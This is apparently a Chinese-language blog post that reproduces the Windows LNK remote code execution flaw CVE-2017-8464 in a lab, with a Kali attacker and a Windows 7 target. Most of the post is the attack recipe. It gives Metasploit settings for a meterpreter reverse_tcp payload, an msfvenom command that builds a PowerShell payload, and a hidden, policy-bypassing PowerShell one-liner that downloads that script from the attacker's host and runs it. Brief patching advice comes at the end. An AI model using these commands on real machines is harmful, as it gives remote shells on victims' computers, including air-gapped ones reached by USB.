文章目录

  • 影响版本
  • 危害
  • 漏洞原理
  • 漏洞复现
    • 任务环境
    • 创建EXP
    • 获取靶机权限
    • 利用Powershell获取权限
  • 修复建议

影响版本

Windows 7Windows 8.1Windows RT 8.1Windows 10Windows Server 2008Windows Server 2008 R2Windows Server 2012Windows Server 2012 R2Windows Server 2016

危害

被攻击机插入存在exp的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。

漏洞原理

当Windows搜索处理内存中的对象时,存在远程代码执行漏洞,攻击者可以利用此漏洞完全控制被攻击机。

漏洞复现

任务环境
  • 攻击机:Kali2019
  • 靶机:Win7 SP1
创建EXP
  • 打开MSF,使用CVE_2017_8464漏洞模块

  • 设置参数,LHOST(kali IP)、LPORT、payload

LHOST=192.168.1.106
LPORT=4444
payload=windows/meterpreter/reverse_tcp

  • 创建EXP,exp存放在/root/.msf4/local/下

获取靶机权限
  • 开启监听

  • 将存有EXP的U盘插入靶机,并执行cpl文件
  • 获得权限
利用Powershell获取权限
  • 生成攻击文件exp.ps1并移动到网站根目录
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.106 -f  psh-reflection>exp.ps1

  • 开启监听
  • 打开靶机,新建一个快捷键
  • 输入构造的payload
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.106/exp.ps1‘);test.ps1"

  • 运行创建好的powershell.exe文件
  • 获取权限

修复建议

更新Windows操作系统补丁
禁用USB自动播放
安装杀毒软件

震网三代漏洞复现(CVE-2017-8464)相关推荐

  1. CVE2017-8464:震网三代漏洞分析

    CVE2017-8464:震网三代漏洞分析(转) 转载 本文由Kilig原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/214846 安全 ...

  2. CVE-2017-8464(震网三代)漏洞分析与复现

    目录 一.CVE-2017-8464漏洞简介 1.简介 2.CVE-2017-8464漏洞原理 3.漏洞影响范围 二.复现环境 三.漏洞复现 1.kali下生成一个反弹的ps1的shell,文件名为s ...

  3. 【从零复现CVE漏洞】Tenda 路由器栈溢出复现(CVE-2018-18708)

    1 漏洞概述 从搜索引擎中搜索一下CVE会有很多提供CVE索引的网站,我们简要的看一下这个CVE的描述. An issue was discovered on Tenda AC7 V15.03.06. ...

  4. CVE(2017-15715、2021-41773、2021-40438)漏洞复现

    仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...

  5. java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...

  6. Office 远程代码执行漏洞复现过程

    本文来自作者肖志华在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录. 编辑 | 天津饭 直接贴本地复现过程,至于怎么利用还请自己思考. 2017年11月 ...

  7. Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328

    Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...

  8. 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】

    MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...

  9. 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复

    20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellco ...

最新文章

  1. Idea 2018.2.5创建springboot项目依赖包没有的错误
  2. Python语言环境错误:不支持的语言环境设置
  3. Apache Spark 2.0预览: 机器学习模型持久化
  4. 线程的常用方法——currentThread方法||在main方法中直接调用run()方法,没有开启新的线程,以在run方法中的当前线程就是main线程||启动子线程,子线程会调用run方法
  5. 2. Nest:Controller
  6. 布局管理器 5-----绝对布局
  7. chrome 历史版本_2020 年最后一次更新,Chrome 性能大提升的新版本来了
  8. Git和GitHub使用教程
  9. ios退款 怎么定位到是哪个用户_关于ios企业签名必须知道的几点
  10. 图像缩放的双线性内插值算法的原理解析
  11. iOS培训章节——C++函数的重载
  12. JavaScript Demo - so cool
  13. HTTP和WebSocket协议(二)
  14. 如何在sh的字符串中包含换行符?
  15. [spark]Spark2.4.6用put写入写入Hbase1.3.1
  16. 23.2. REPLACE
  17. gdal-3.1.2-release下载页面出错
  18. Atitit junit最佳实践 目录 1.1. 可以在包级别建立测试,避免太多的test class 1 1.2. 但文件独立方法测试 避免建立太多的class 1 1.3. 测试方法直接从bat
  19. vi设计清单_最终产品设计组合清单
  20. 混合云架构下的安全风险分析和安全解决方案建议

热门文章

  1. 相变材料二氧化钒薄膜制备总结
  2. 教你辨别专利编号| 专利的专利号申请号公开号公告号
  3. RFID射频技术基本原理与射频技术中的基本单位
  4. qt5编译项目出现undefined reference to 'classname::staticmetaobject'
  5. 3D光场重建率先被中国团队推向零售商用!谷歌同款技术,哈佛高材生创办,高通投资认定...
  6. 影响PCBA制造的成本有很多方面,怎么有效降低成本?
  7. 一步步教你破解Termius(针对Termius持续更新导致失效解决,提供7.22.1老版本termius)|CSDN创作打卡
  8. 第五讲 中断、异常和信号
  9. 另眼看嘀嘀:打车类应用背后的政策风险
  10. oracle dba 连不上,Oracle 10g的DBA无法登录解决方案